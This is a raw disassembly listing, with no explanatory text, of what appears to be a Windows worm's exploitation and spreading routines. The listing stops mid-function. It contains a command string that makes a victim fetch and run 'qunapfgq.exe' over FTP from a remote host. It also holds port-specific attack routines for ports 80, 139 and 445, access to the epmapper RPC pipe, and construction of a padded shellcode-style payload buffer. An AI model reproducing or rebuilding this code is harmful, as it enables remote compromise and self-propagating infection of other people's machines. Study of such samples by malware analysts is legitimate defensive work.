loc_40D45B: ; CODE XREF: sub_40D340+FA�j
cmp dword ptr [ebp-18h], 48h
jb short loc_40D479
push dword ptr [ebp+14h]
call sub_41B9C0
pop ecx
push eax
lea ecx, [ebp-38h]
push dword ptr [ebp+14h]
call sub_40D7CD
mov [ebp-18h], edi
loc_40D479: ; CODE XREF: sub_40D340+11F�j
push 4
pop esi
cmp [ebp-1Ch], esi
jnb short loc_40D493
sub esi, [ebp-1Ch]
loc_40D484: ; CODE XREF: sub_40D340+151�j
push 3Dh
push 1
lea ecx, [ebp-38h]
call sub_40D774
dec esi
jnz short loc_40D484
loc_40D493: ; CODE XREF: sub_40D340+13F�j
cmp [ebp+10h], edi
ja loc_40D391
push 1
pop ebx
loc_40D49F: ; CODE XREF: sub_40D340+48�j
mov esi, [ebp+8]
mov al, [ebp-38h]
push edi
mov ecx, esi
mov [esi], al
call sub_40D977
push ds:dword_427678
lea eax, [ebp-38h]
mov ecx, esi
push edi
push eax
call sub_40D824
mov [ebp-20h], ebx
and byte ptr [ebp-4], 0
push ebx
lea ecx, [ebp-38h]
call sub_40D977
mov ecx, [ebp-0Ch]
mov eax, esi
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_40D340 endp
; =============== S U B R O U T I N E =======================================
sub_40D4E2 proc near ; CODE XREF: .text:0040D6DF�p
mov eax, offset loc_426AC4
call sub_41D640
sub esp, 10h
push ebx
push esi
push edi
push offset byte_43DB88
lea eax, [ebp-1Ch]
push dword ptr [ebp+10h]
xor ebx, ebx
mov [ebp-4], ebx
push dword ptr [ebp+0Ch]
push eax
call sub_40D340
mov eax, [ebp+1Ch]
mov ecx, [ebp-14h]
mov byte ptr [ebp-4], 1
lea esi, [ecx+eax+36h]
push esi
call sub_41BEB5
mov edi, eax
add esp, 14h
cmp edi, ebx
jnz short loc_40D52C
xor bl, bl
jmp short loc_40D570
; ---------------------------------------------------------------------------
loc_40D52C: ; CODE XREF: sub_40D4E2+44�j
mov ecx, [ebp-18h]
mov eax, offset dword_427688
cmp ecx, ebx
jnz short loc_40D53A
mov ecx, eax
loc_40D53A: ; CODE XREF: sub_40D4E2+54�j
cmp [ebp+18h], ebx
jz short loc_40D542
mov eax, [ebp+18h]
loc_40D542: ; CODE XREF: sub_40D4E2+5B�j
push ecx
push eax
push offset aGetHttp1_0Host ; "GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"...
push esi
push edi
call sub_41C360
add esp, 14h
push ebx
push esi
push edi
push dword ptr [ebp+8]
call dword_4CBA24 ; send
cmp eax, esi
jz short loc_40D567
xor bl, bl
jmp short loc_40D569
; ---------------------------------------------------------------------------
loc_40D567: ; CODE XREF: sub_40D4E2+7F�j
mov bl, 1
loc_40D569: ; CODE XREF: sub_40D4E2+83�j
push edi
call sub_41BA91
pop ecx
loc_40D570: ; CODE XREF: sub_40D4E2+48�j
and byte ptr [ebp-4], 0
push 1
lea ecx, [ebp-1Ch]
call sub_40D977
or dword ptr [ebp-4], 0FFFFFFFFh
push 1
lea ecx, [ebp+14h]
call sub_40D977
mov ecx, [ebp-0Ch]
pop edi
mov al, bl
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_40D4E2 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 420h
and byte ptr [ebp-420h], 0
push ebx
push esi
push edi
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp-41Fh]
push 8Fh
rep stosd
stosw
stosb
lea eax, [ebp-420h]
push offset dword_432300
push eax
call sub_41CD20
add esp, 0Ch
mov eax, offset aQunapfgq_exe ; "qunapfgq.exe"
push eax
push eax
movzx eax, word ptr dword_4CB710
push eax
push dword ptr [ebp+8]
call sub_40AA06
pop ecx
push eax
push offset aCmdCEchoOpenSD ; "cmd /c echo open %s %d > o&echo user 1 "...
lea eax, [ebp-391h]
push 400h
push eax
call sub_41C360
add eax, 90h
push eax
lea eax, [ebp-420h]
push eax
push 164h
lea eax, [ebp-8]
push offset aSvwfbA ; "SVWfì€"
push eax
call sub_40CD9E
xor esi, esi
add esp, 30h
cmp [ebp-4], esi
jnz short loc_40D63B
xor eax, eax
jmp loc_40D767
; ---------------------------------------------------------------------------
loc_40D63B: ; CODE XREF: .text:0040D632�j
mov [ebp-0Ch], esi
loc_40D63E: ; CODE XREF: .text:0040D73E�j
test esi, esi
jnz loc_40D744
push 6
push 1
push 2
call ds:dword_427204 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40D72C
xor eax, eax
lea edi, [ebp-1Ah]
stosd
push dword ptr [ebp+0A8h]
stosd
stosd
stosw
mov word ptr [ebp-1Ch], 2
call dword_4CB9D4 ; htons
mov [ebp-1Ah], ax
lea eax, [ebp+0Ch]
push eax
call dword_4CBA14 ; inet_addr
mov [ebp-18h], eax
lea eax, [ebp-1Ch]
push 10h
push eax
push ebx
call dword_4CB97C ; connect
cmp eax, 0FFFFFFFFh
jz loc_40D721
cmp dword ptr [ebp+0A8h], 50h
jnz short loc_40D6E9
mov al, [ebp+0C3h]
sub esp, 10h
mov esi, esp
mov [ebp-20h], esp
push 0
mov ecx, esi
mov [esi], al
call sub_40D977
lea eax, [ebp+0Ch]
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+0Ch]
push eax
mov ecx, esi
call sub_40D9B3
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_40D4E2
add esp, 1Ch
jmp short loc_40D71E
; ---------------------------------------------------------------------------
loc_40D6E9: ; CODE XREF: .text:0040D6A7�j
cmp dword ptr [ebp+0A8h], 8Bh
jnz short loc_40D703
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_40D2A2
jmp short loc_40D71B
; ---------------------------------------------------------------------------
loc_40D703: ; CODE XREF: .text:0040D6F3�j
cmp dword ptr [ebp+0A8h], 1BDh
jnz short loc_40D721
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_40D1C8
loc_40D71B: ; CODE XREF: .text:0040D701�j
add esp, 0Ch
loc_40D71E: ; CODE XREF: .text:0040D6E7�j
movzx esi, al
loc_40D721: ; CODE XREF: .text:0040D69A�j
; .text:0040D70D�j
push ebx
call dword_4CBA6C ; closesocket
test esi, esi
jnz short loc_40D737
loc_40D72C: ; CODE XREF: .text:0040D657�j
push 3E8h
call ds:dword_427080 ; Sleep
loc_40D737: ; CODE XREF: .text:0040D72A�j
inc dword ptr [ebp-0Ch]
cmp dword ptr [ebp-0Ch], 2
jl loc_40D63E
loc_40D744: ; CODE XREF: .text:0040D640�j
lea ecx, [ebp-8]
call sub_40CBC3
test esi, esi
jz short loc_40D765
mov eax, [ebp+0B0h]
shl eax, 6
inc dword_431800[eax]
lea eax, dword_431800[eax]
loc_40D765: ; CODE XREF: .text:0040D74E�j
mov eax, esi
loc_40D767: ; CODE XREF: .text:0040D636�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A88
loc_40D76C: ; CODE XREF: sub_426A88+3�j
; .text:00426AA1�j ...
push 1
call sub_40D977
retn
; END OF FUNCTION CHUNK FOR sub_426A88
; =============== S U B R O U T I N E =======================================
sub_40D774 proc near ; CODE XREF: sub_40D340+110�p
; sub_40D340+14B�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
mov eax, ds:dword_427678
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, ecx
push edi
sub eax, [esi+8]
cmp eax, ebx
ja short loc_40D78E
call sub_42629A
loc_40D78E: ; CODE XREF: sub_40D774+13�j
test ebx, ebx
jbe short loc_40D7C5
mov edi, ebx
push 0
add edi, [esi+8]
mov ecx, esi
push edi
call sub_40D8F2
test al, al
jz short loc_40D7C5
movsx eax, [esp+0Ch+arg_4]
push ebx
push eax
mov eax, [esi+4]
add eax, [esi+8]
push eax
call sub_41BF70
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [eax+edi], 0
loc_40D7C5: ; CODE XREF: sub_40D774+1C�j
; sub_40D774+2F�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_40D774 endp
; =============== S U B R O U T I N E =======================================
sub_40D7CD proc near ; CODE XREF: sub_40D340+131�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, ds:dword_427678
push ebx
mov ebx, [esp+4+arg_4]
push esi
mov esi, ecx
push edi
sub eax, [esi+8]
cmp eax, ebx
ja short loc_40D7E7
call sub_42629A
loc_40D7E7: ; CODE XREF: sub_40D7CD+13�j
test ebx, ebx
jbe short loc_40D81C
mov edi, ebx
push 0
add edi, [esi+8]
mov ecx, esi
push edi
call sub_40D8F2
test al, al
jz short loc_40D81C
mov eax, [esi+8]
push ebx
push [esp+10h+arg_0]
add eax, [esi+4]
push eax
call sub_41CD20
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [edi+eax], 0
loc_40D81C: ; CODE XREF: sub_40D7CD+1C�j
; sub_40D7CD+2F�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_40D7CD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D824 proc near ; CODE XREF: sub_40D340+17C�p
; sub_4261B0+15�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
mov edi, ecx
cmp [ebx+8], eax
jnb short loc_40D83C
call sub_426173
loc_40D83C: ; CODE XREF: sub_40D824+11�j
mov eax, [ebx+8]
mov ecx, [ebp+arg_4]
mov esi, eax
sub esi, ecx
cmp [ebp+arg_8], esi
jnb short loc_40D84E
mov esi, [ebp+arg_8]
loc_40D84E: ; CODE XREF: sub_40D824+25�j
cmp edi, ebx
jnz short loc_40D870
push ds:dword_427678
add esi, ecx
mov ecx, edi
push esi
call sub_40D9E8
push [ebp+arg_4]
mov ecx, edi
push 0
call sub_40D9E8
jmp short loc_40D8E9
; ---------------------------------------------------------------------------
loc_40D870: ; CODE XREF: sub_40D824+2C�j
test esi, esi
jbe short loc_40D8B3
cmp esi, eax
jnz short loc_40D8B3
mov eax, [ebx+4]
test eax, eax
jnz short loc_40D884
mov eax, offset dword_427688
loc_40D884: ; CODE XREF: sub_40D824+59�j
cmp byte ptr [eax-1], 0FEh
jnb short loc_40D8B3
push 1
mov ecx, edi
call sub_40D977
mov eax, [ebx+4]
test eax, eax
jnz short loc_40D89F
mov eax, offset dword_427688
loc_40D89F: ; CODE XREF: sub_40D824+74�j
mov [edi+4], eax
mov ecx, [ebx+8]
mov [edi+8], ecx
mov ecx, [ebx+0Ch]
mov [edi+0Ch], ecx
inc byte ptr [eax-1]
jmp short loc_40D8E9
; ---------------------------------------------------------------------------
loc_40D8B3: ; CODE XREF: sub_40D824+4E�j
; sub_40D824+52�j ...
push 1
push esi
mov ecx, edi
call sub_40D8F2
test al, al
jz short loc_40D8E9
mov eax, [ebx+4]
test eax, eax
jnz short loc_40D8CD
mov eax, offset dword_427688
loc_40D8CD: ; CODE XREF: sub_40D824+A2�j
mov ecx, [ebp+arg_4]
push esi
add eax, ecx
push eax
push dword ptr [edi+4]
call sub_41CD20
mov eax, [edi+4]
add esp, 0Ch
mov [edi+8], esi
and byte ptr [eax+esi], 0
loc_40D8E9: ; CODE XREF: sub_40D824+4A�j
; sub_40D824+8D�j ...
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_40D824 endp
; =============== S U B R O U T I N E =======================================
sub_40D8F2 proc near ; CODE XREF: sub_40D340+3D�p
; sub_40D774+28�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
cmp edi, 0FFFFFFFDh
jbe short loc_40D904
call sub_42629A
loc_40D904: ; CODE XREF: sub_40D8F2+B�j
mov ecx, [esi+4]
xor edx, edx
cmp ecx, edx
jz short loc_40D92D
mov al, [ecx-1]
cmp al, dl
jz short loc_40D92D
cmp al, 0FFh
jz short loc_40D92D
cmp edi, edx
jnz short loc_40D968
dec al
push edx
mov [ecx-1], al
loc_40D922: ; CODE XREF: sub_40D8F2+47�j
mov ecx, esi
call sub_40D977
loc_40D929: ; CODE XREF: sub_40D8F2+4B�j
; sub_40D8F2+52�j
xor al, al
jmp short loc_40D972
; ---------------------------------------------------------------------------
loc_40D92D: ; CODE XREF: sub_40D8F2+19�j
; sub_40D8F2+20�j ...
cmp edi, edx
jnz short loc_40D946
cmp [esp+8+arg_4], dl
jz short loc_40D93B
push 1
jmp short loc_40D922
; ---------------------------------------------------------------------------
loc_40D93B: ; CODE XREF: sub_40D8F2+43�j
cmp ecx, edx
jz short loc_40D929
mov [esi+8], edx
mov [ecx], dl
jmp short loc_40D929
; ---------------------------------------------------------------------------
loc_40D946: ; CODE XREF: sub_40D8F2+3D�j
cmp [esp+8+arg_4], dl
jz short loc_40D963
mov eax, [esi+0Ch]
cmp eax, 1Fh
ja short loc_40D958
cmp eax, edi
jnb short loc_40D970
loc_40D958: ; CODE XREF: sub_40D8F2+60�j
push 1
mov ecx, esi
call sub_40D977
jmp short loc_40D968
; ---------------------------------------------------------------------------
loc_40D963: ; CODE XREF: sub_40D8F2+58�j
cmp [esi+0Ch], edi
jnb short loc_40D970
loc_40D968: ; CODE XREF: sub_40D8F2+28�j
; sub_40D8F2+6F�j
push edi
mov ecx, esi
call sub_40DA4F
loc_40D970: ; CODE XREF: sub_40D8F2+64�j
; sub_40D8F2+74�j
mov al, 1
loc_40D972: ; CODE XREF: sub_40D8F2+39�j
pop edi
pop esi
retn 8
sub_40D8F2 endp
; =============== S U B R O U T I N E =======================================
sub_40D977 proc near ; CODE XREF: sub_40D340+1F�p
; sub_40D340+16A�p ...
arg_0 = byte ptr 4
cmp [esp+arg_0], 0
push esi
mov esi, ecx
jz short loc_40D9A3
mov eax, [esi+4]
test eax, eax
jz short loc_40D9A3
lea ecx, [eax-1]
mov al, [eax-1]
test al, al
jz short loc_40D99C
cmp al, 0FFh
jz short loc_40D99C
dec al
mov [ecx], al
jmp short loc_40D9A3
; ---------------------------------------------------------------------------
loc_40D99C: ; CODE XREF: sub_40D977+19�j
; sub_40D977+1D�j
push ecx
call sub_41D65F
pop ecx
loc_40D9A3: ; CODE XREF: sub_40D977+8�j
; sub_40D977+F�j ...
and dword ptr [esi+4], 0
and dword ptr [esi+8], 0
and dword ptr [esi+0Ch], 0
pop esi
retn 4
sub_40D977 endp
; =============== S U B R O U T I N E =======================================
sub_40D9B3 proc near ; CODE XREF: .text:0040D6D3�p
; sub_40DB0C+28�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
mov edi, [esp+8+arg_4]
push 1
mov esi, ecx
push edi
call sub_40D8F2
test al, al
jz short loc_40D9E1
push edi
push [esp+0Ch+arg_0]
push dword ptr [esi+4]
call sub_41CD20
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [eax+edi], 0
loc_40D9E1: ; CODE XREF: sub_40D9B3+12�j
mov eax, esi
pop edi
pop esi
retn 8
sub_40D9B3 endp
; =============== S U B R O U T I N E =======================================
sub_40D9E8 proc near ; CODE XREF: sub_40D824+39�p
; sub_40D824+45�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, ecx
cmp [edi+8], esi
jnb short loc_40D9FB
call sub_426173
loc_40D9FB: ; CODE XREF: sub_40D9E8+C�j
mov ecx, edi
call sub_40DB0C
mov eax, [edi+8]
mov ebx, [esp+0Ch+arg_4]
sub eax, esi
cmp eax, ebx
jnb short loc_40DA11
mov ebx, eax
loc_40DA11: ; CODE XREF: sub_40D9E8+25�j
test ebx, ebx
jbe short loc_40DA47
mov ecx, [edi+4]
sub eax, ebx
add ecx, esi
push eax
lea eax, [ecx+ebx]
push eax
push ecx
call sub_41D670
mov esi, [edi+8]
add esp, 0Ch
sub esi, ebx
mov ecx, edi
push 0
push esi
call sub_40D8F2
test al, al
jz short loc_40DA47
mov eax, [edi+4]
mov [edi+8], esi
and byte ptr [esi+eax], 0
loc_40DA47: ; CODE XREF: sub_40D9E8+2B�j
; sub_40D9E8+53�j
mov eax, edi
pop edi
pop esi
pop ebx
retn 8
sub_40D9E8 endp
; =============== S U B R O U T I N E =======================================
sub_40DA4F proc near ; CODE XREF: sub_40D8F2+79�p
mov eax, offset loc_426AD0
call sub_41D640
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+8]
or edi, 1Fh
mov esi, ecx
cmp edi, 0FFFFFFFDh
mov [ebp-10h], esp
mov [ebp-14h], esi
jbe short loc_40DA75
mov edi, [ebp+8]
loc_40DA75: ; CODE XREF: sub_40DA4F+21�j
and dword ptr [ebp-4], 0
lea eax, [edi+2]
test eax, eax
jge short loc_40DA82
xor eax, eax
loc_40DA82: ; CODE XREF: sub_40DA4F+2F�j
push eax
call sub_41D9A5
pop ecx
mov [ebp+8], eax
jmp short loc_40DAB3
; ---------------------------------------------------------------------------
loc_40DA8E: ; DATA XREF: .rdata:00427F84�o
mov eax, [ebp+8]
mov [ebp-18h], eax
add eax, 2
test eax, eax
jge short loc_40DA9D
xor eax, eax
loc_40DA9D: ; CODE XREF: sub_40DA4F+4A�j
push eax
call sub_41D9A5
mov [ebp+8], eax
pop ecx
mov eax, offset loc_40DAAD
retn
; ---------------------------------------------------------------------------
loc_40DAAD: ; DATA XREF: sub_40DA4F+58�o
mov esi, [ebp-14h]
mov edi, [ebp-18h]
loc_40DAB3: ; CODE XREF: sub_40DA4F+3D�j
mov eax, [esi+8]
test eax, eax
jbe short loc_40DAD1
cmp eax, edi
jbe short loc_40DAC0
mov eax, edi
loc_40DAC0: ; CODE XREF: sub_40DA4F+6D�j
push eax
mov eax, [ebp+8]
push dword ptr [esi+4]
inc eax
push eax
call sub_41CD20
add esp, 0Ch
loc_40DAD1: ; CODE XREF: sub_40DA4F+69�j
mov ebx, [esi+8]
push 1
mov ecx, esi
call sub_40D977
mov eax, [ebp+8]
inc eax
mov [esi+4], eax
and byte ptr [eax-1], 0
cmp ebx, edi
mov [esi+0Ch], edi
ja short loc_40DAF1
mov edi, ebx
loc_40DAF1: ; CODE XREF: sub_40DA4F+9E�j
mov eax, [esi+4]
mov ecx, [ebp-0Ch]
mov [esi+8], edi
and byte ptr [eax+edi], 0
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_40DA4F endp
; =============== S U B R O U T I N E =======================================
sub_40DB0C proc near ; CODE XREF: sub_40D9E8+15�p
push esi
push edi
mov edi, ecx
mov esi, [edi+4]
test esi, esi
jz short loc_40DB39
mov al, [esi-1]
test al, al
jz short loc_40DB39
cmp al, 0FFh
jz short loc_40DB39
push 1
call sub_40D977
push esi
call sub_41B9C0
pop ecx
push eax
push esi
mov ecx, edi
call sub_40D9B3
loc_40DB39: ; CODE XREF: sub_40DB0C+9�j
; sub_40DB0C+10�j ...
pop edi
pop esi
retn
sub_40DB0C endp
; =============== S U B R O U T I N E =======================================
sub_40DB3C proc near ; DATA XREF: .data:00429008�o
test byte_4DC018, 1
jnz short loc_40DB4C
or byte_4DC018, 1
loc_40DB4C: ; CODE XREF: sub_40DB3C+7�j
jmp $+5
push offset nullsub_1
call sub_41DA20
pop ecx
retn
sub_40DB3C endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DB5E proc near ; CODE XREF: .text:0040DF74�p
var_354 = byte ptr -354h
var_34E = byte ptr -34Eh
var_124 = byte ptr -124h
var_123 = byte ptr -123h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 354h
push ebx
push esi
push edi
mov esi, offset off_432948
lea edi, [ebp+var_C]
mov ecx, 8Ah
movsd
movsd
movsd
mov esi, offset asc_432940 ; "\\\\"
lea edi, [ebp+var_354]
movsd
movsw
xor eax, eax
lea edi, [ebp+var_34E]
rep stosd
stosw
mov al, byte_43DB88
push 45h
mov [ebp+var_124], al
pop ecx
xor eax, eax
lea edi, [ebp+var_123]
rep stosd
stosw
stosb
lea eax, [ebp+var_124]
push 0FFh
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
xor edi, edi
push edi
push edi
call ds:dword_4270E8 ; MultiByteToWideChar
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_354]
push eax
call sub_41DA61
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_354]
push eax
call sub_41DA61
mov esi, [ebp+arg_4]
lea eax, [ebp+var_354]
add esp, 10h
mov [esi+14h], eax
mov eax, offset dword_4CE6F4
push edi
push eax
push eax
push esi
mov [esi+4], edi
mov [esi+10h], edi
mov [esi+1Ch], edi
call dword_4CBA74
cmp eax, 5
mov ebx, 4C3h
jz short loc_40DC22
cmp eax, ebx
jnz short loc_40DC2C
loc_40DC22: ; CODE XREF: sub_40DB5E+BE�j
push edi
push edi
push edi
push esi
call dword_4CBA74
loc_40DC2C: ; CODE XREF: sub_40DB5E+C2�j
cmp eax, 5
jz short loc_40DC3A
cmp eax, ebx
jz short loc_40DC3A
push 1
pop eax
jmp short loc_40DC3C
; ---------------------------------------------------------------------------
loc_40DC3A: ; CODE XREF: sub_40DB5E+D1�j
; sub_40DB5E+D5�j
xor eax, eax
loc_40DC3C: ; CODE XREF: sub_40DB5E+DA�j
pop edi
pop esi
pop ebx
leave
retn
sub_40DB5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DC41 proc near ; CODE XREF: .text:0040DFC6�p
; .text:0040E0A6�p
var_354 = byte ptr -354h
var_34E = byte ptr -34Eh
var_124 = byte ptr -124h
var_123 = byte ptr -123h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 354h
push esi
push edi
mov esi, offset off_432948
lea edi, [ebp+var_C]
movsd
movsd
movsd
mov esi, offset asc_432940 ; "\\\\"
lea edi, [ebp+var_354]
movsd
movsw
mov ecx, 8Ah
xor eax, eax
lea edi, [ebp+var_34E]
push 45h
rep stosd
stosw
mov al, byte_43DB88
pop ecx
mov [ebp+var_124], al
xor eax, eax
lea edi, [ebp+var_123]
push 0FFh
rep stosd
stosw
stosb
lea eax, [ebp+var_124]
xor esi, esi
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push esi
push esi
call ds:dword_4270E8 ; MultiByteToWideChar
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_354]
push eax
call sub_41DA61
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_354]
push eax
call sub_41DA61
add esp, 10h
loc_40DCD2: ; CODE XREF: sub_40DC41+AF�j
push esi
lea eax, [ebp+var_354]
push esi
push eax
call dword_4CB90C
test eax, eax
jz short loc_40DCF2
push 7D0h
call ds:dword_427080 ; Sleep
jmp short loc_40DCD2
; ---------------------------------------------------------------------------
loc_40DCF2: ; CODE XREF: sub_40DC41+A2�j
push 1
pop eax
pop edi
pop esi
leave
retn
sub_40DC41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DCF9 proc near ; CODE XREF: .text:0040DFF5�p
; .text:0040E133�p
var_3004 = byte ptr -3004h
var_2004 = byte ptr -2004h
var_1FE0 = byte ptr -1FE0h
var_1FD4 = byte ptr -1FD4h
var_1F2D = byte ptr -1F2Dh
var_1004 = byte ptr -1004h
var_FFC = dword ptr -0FFCh
var_FF4 = dword ptr -0FF4h
var_F84 = dword ptr -0F84h
var_F80 = dword ptr -0F80h
var_F50 = dword ptr -0F50h
var_F4C = dword ptr -0F4Ch
var_F34 = dword ptr -0F34h
var_E78 = dword ptr -0E78h
var_CA4 = dword ptr -0CA4h
var_C9C = dword ptr -0C9Ch
var_C94 = byte ptr -0C94h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
mov eax, 3004h
call sub_41C500
push esi
push edi
push offset aQunapfgq_exe ; "qunapfgq.exe"
mov esi, 0A7h
push [ebp+arg_0]
mov [ebp+var_4], esi
call sub_40AA06
pop ecx
push eax
lea eax, [ebp+var_3004]
push 1000h
push eax
call sub_40B22B
mov edi, eax
add esp, 10h
test edi, edi
jz loc_40DF48
push ebx
mov ebx, offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
push 30h
lea eax, [ebp+var_2004]
push ebx
push eax
call sub_41CD20
push esi
lea eax, [ebp+var_1FD4]
push 0FFFFFF90h
push eax
call sub_41BF70
lea eax, [ebp+var_3004]
push edi
push eax
lea eax, [ebp+var_1F2D]
push eax
call sub_41CD20
add esp, 24h
lea esi, [edi+0D7h]
loc_40DD7E: ; CODE XREF: sub_40DCF9+D3�j
mov eax, esi
push 10h
cdq
pop ecx
idiv ecx
cmp edx, 0Ch
jz short loc_40DDCE
mov esi, [ebp+var_4]
push 30h
lea eax, [ebp+var_2004]
inc esi
push ebx
push eax
mov [ebp+var_4], esi
call sub_41CD20
push esi
lea eax, [ebp+var_1FD4]
push 0FFFFFF90h
push eax
call sub_41BF70
lea eax, [ebp+var_3004]
push edi
push eax
lea eax, [ebp+esi+var_1FD4]
push eax
call sub_41CD20
add esp, 24h
lea esi, [esi+edi+30h]
jmp short loc_40DD7E
; ---------------------------------------------------------------------------
loc_40DDCE: ; CODE XREF: sub_40DCF9+90�j
cmp [ebp+arg_C4], 0
jz short loc_40DDE9
cmp [ebp+arg_C0], 3
jz short loc_40DDF2
cmp [ebp+arg_C0], 0
jmp short loc_40DDF0
; ---------------------------------------------------------------------------
loc_40DDE9: ; CODE XREF: sub_40DCF9+DC�j
cmp [ebp+arg_C0], 3
loc_40DDF0: ; CODE XREF: sub_40DCF9+EE�j
jnz short loc_40DDFB
loc_40DDF2: ; CODE XREF: sub_40DCF9+E5�j
push 4
push offset dword_43293C
jmp short loc_40DE02
; ---------------------------------------------------------------------------
loc_40DDFB: ; CODE XREF: sub_40DCF9:loc_40DDF0�j
push 4
push offset dword_432938
loc_40DE02: ; CODE XREF: sub_40DCF9+100�j
lea eax, [ebp+var_1FE0]
push eax
call sub_41CD20
add esp, 0Ch
lea eax, [ebp+var_1004]
push 360h
push offset dword_432470
push eax
call sub_41CD20
push 10h
lea eax, [ebp+var_CA4]
push offset dword_4327D4
push eax
call sub_41CD20
lea eax, [ebp+var_2004]
push esi
push eax
lea eax, [ebp+var_C94]
push eax
call sub_41CD20
lea edi, [esi+370h]
push 3Ch
push offset off_4327E8
lea eax, [ebp+edi+var_1004]
push eax
call sub_41CD20
add edi, 3Ch
push 30h
push offset dword_432828
lea eax, [ebp+edi+var_1004]
push eax
call sub_41CD20
mov eax, esi
add edi, 30h
cdq
sub eax, edx
sar eax, 1
add [ebp+var_CA4], eax
add [ebp+var_C9C], eax
mov eax, [ebp+var_FFC]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FFC], eax
mov eax, [ebp+var_FF4]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FF4], eax
mov eax, [ebp+var_F84]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F84], eax
mov eax, [ebp+var_F80]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F80], eax
mov eax, [ebp+var_F50]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F50], eax
mov eax, [ebp+var_F4C]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F4C], eax
mov eax, [ebp+var_F34]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F34], eax
mov eax, [ebp+var_E78]
lea eax, [eax+esi-0Ch]
lea esi, [edi+1]
push esi
mov [ebp+var_E78], eax
call sub_41BEB5
add esp, 40h
mov ebx, eax
push esi
push 0
push ebx
call sub_41BF70
lea eax, [ebp+var_1004]
push edi
push eax
push ebx
call sub_41CD20
mov eax, [ebp+arg_BC]
add esp, 18h
mov [eax], edi
mov eax, ebx
pop ebx
loc_40DF48: ; CODE XREF: sub_40DCF9+3E�j
pop edi
pop esi
leave
retn
sub_40DCF9 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 1338h
call sub_41C500
cmp dword ptr [ebp+0A8h], 1BDh
push ebx
push esi
push edi
jnz loc_40E0BA
lea eax, [ebp-34h]
push eax
lea eax, [ebp+0Ch]
push eax
call sub_40DB5E
pop ecx
test eax, eax
pop ecx
jz loc_40E1CA
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-338h]
push offset aSPipeEpmapper ; "\\\\%s\\pipe\\epmapper"
push eax
call sub_41C266
add esp, 0Ch
xor ebx, ebx
lea eax, [ebp-338h]
push ebx
push 80h
push 3
push ebx
push 1
push 0C0000000h
push eax
call ds:dword_4270F8 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp-4], eax
jnz short loc_40DFD1
loc_40DFC2: ; CODE XREF: .text:0040E072�j
lea eax, [ebp+0Ch]
push eax
call sub_40DC41
pop ecx
jmp loc_40E1CA
; ---------------------------------------------------------------------------
loc_40DFD1: ; CODE XREF: .text:0040DFC0�j
lea eax, [ebp+0Ch]
push 2
push eax
call sub_4182CD
pop ecx
lea esi, [ebp+8]
pop ecx
push 1
push eax
lea eax, [ebp-10h]
push eax
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40DCF9
add esp, 0C8h
cmp eax, ebx
mov [ebp-8], eax
jz short loc_40E069
mov edi, 186A0h
push edi
call sub_41BEB5
mov esi, eax
push edi
push ebx
push esi
